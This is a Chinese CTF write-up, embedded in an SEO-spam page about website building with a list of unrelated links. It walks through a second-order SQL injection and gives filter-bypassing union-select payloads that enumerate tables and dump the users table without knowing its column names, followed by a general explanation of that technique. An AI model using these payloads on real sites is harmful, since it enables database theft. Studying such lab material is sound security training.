当前位置: 首页 > wzjs >正文

麻涌镇网站建设网络营销策略的内涵

麻涌镇网站建设,网络营销策略的内涵,网站设计实训心得,游戏制作软件培训进入题目页面如下 猜测是二次注入 先注册一个账号 再登录,页面如下 点击申请发布广告 页面如上,存在注入点,尝试 判读是整数型注入还是字符型注入 猜解字段数,尝试发现or,#,空格等被过滤了,只能一个一个试 使用联合…

进入题目页面如下

猜测是二次注入

先注册一个账号

再登录,页面如下

点击申请发布广告

页面如上,存在注入点,尝试

判读是整数型注入还是字符型注入

猜解字段数,尝试发现or,#,空格等被过滤了,只能一个一个试

使用联合查询试试

-1'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

居然有22个

测试后注入点在2处

爆出数据库名

1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

数据库名为web1

爆出表名

1'/**/union/**/select/**/1,database(),group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name="web1"'

表名是abs和users

爆出字段内容

1'/**/union/**/select/**/1,database(),(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

终于得到了flag


无字段名注入

基本概念

在常规的 SQL 注入中,通常需要明确知道数据库表的字段名,然后通过构造恶意输入来干扰 SQL 语句的正常执行。而无字段名注入则是在不知道具体字段名的情况下,仍然能够实施注入攻击,获取数据库中的信息

产生原因

动态 SQL 语句构建:当开发人员在编写代码时,采用动态拼接 SQL 语句的方式,且对用户输入的验证和过滤不严格,就可能为无字段名注入提供机会。

通用查询接口:一些应用程序提供了通用的查询接口,允许用户输入条件进行数据查询,但没有对输入进行有效的限制,可以利用这个接口进行无字段名注入。

攻击原理

无字段名注入主要利用 SQL 语句的一些特性,如 ORDER BY 子句、GROUP BY 子句、LIMIT 子句等,结合盲注技术来逐步获取数据库信息。以下是几种常见的无字段名注入方法:

利用 ORDER BY 子句确定字段数量
SELECT * FROM users WHERE id = 1 ORDER BY 1 -- 正常返回
SELECT * FROM users WHERE id = 1 ORDER BY 2 -- 正常返回
SELECT * FROM users WHERE id = 1 ORDER BY 3 -- 报错

通过不断尝试不同的数字作为 ORDER BY 子句的参数,当返回报错时,说明表中的字段数量小于该数字,从而确定表中的字段数量。

利用 GROUP BY 子句和聚合函数获取数据

在确定了字段数量后,可以利用 GROUP BY 子句和聚合函数(如 COUNTSUM 等)来获取数据。例

SELECT COUNT(*), GROUP_CONCAT(column1, column2) FROM users GROUP BY id;

可以通过不断尝试不同的组合,结合盲注技术,逐步获取字段中的数据。

利用 LIMIT 子句逐行获取数据

在获取了表的字段数量后,可以使用 LIMIT 子句逐行获取数据。

SELECT * FROM users LIMIT 0, 1; -- 获取第一行数据
SELECT * FROM users LIMIT 1, 1; -- 获取第二行数据
http://www.dtcms.com/wzjs/801611.html

相关文章:

  • wordpress可以做下载站简述网站设计的原则
  • WordPress网站子目录访问中国联通与腾讯设立合作
  • 阿里做外贸的网站大学英语精品课程网站建设
  • 个人是否可以做网站怎么做网络销售的网站
  • 怎么看别人网站是哪里做的网站左侧固定代码
  • 如何做旅游网站的思维导图中关村在线报价大全
  • 做网站用户充值提现中国手机网站
  • 个人建设网站教程住房与建设管理局
  • 南宁网站制作建设网站建设 国风网络
  • 网站首页默认的文件名一般为阜阳网站建设推广
  • 没有网站如何做天天联盟海安房产网
  • 网站规划与网页设计总结余姚企业网站建设公司
  • 广州电商网站建设赣州有做网站推广的公司吗
  • 手机网站建设实验报告火狐显示网站开发
  • 龙江网站建设phpcms 网站根目录
  • 怎样设计网站或网页沈阳城市建设招生网站
  • 查网站怎么做的企业查找
  • 烟台做网站哪里好wordpress自定义字段
  • 网站开发用什么开发工具好呢网站建设 镇江
  • 成品ppt的网站免费观看网页游戏电脑版
  • asp网站变慢做异形建筑的网站
  • 电商网站开发常用代码网站设置不安全
  • 领优惠券的网站是怎么做的字体排版设计网站
  • 哪个网站有做形象墙深圳市建设信息网官网
  • 如何在企业版社保网站做增员漳州 网站建设公司哪家好
  • 动易网站内容管理系统长沙做网站 青创互联
  • 建立淘宝客网站永久免费国外vps无需信用卡
  • 烟台开发区做网站2019wordpress使用手册
  • 山东省建设厅网站电话查询商务网站建设服务商
  • 老电脑做网站服务器查看网站是什么空间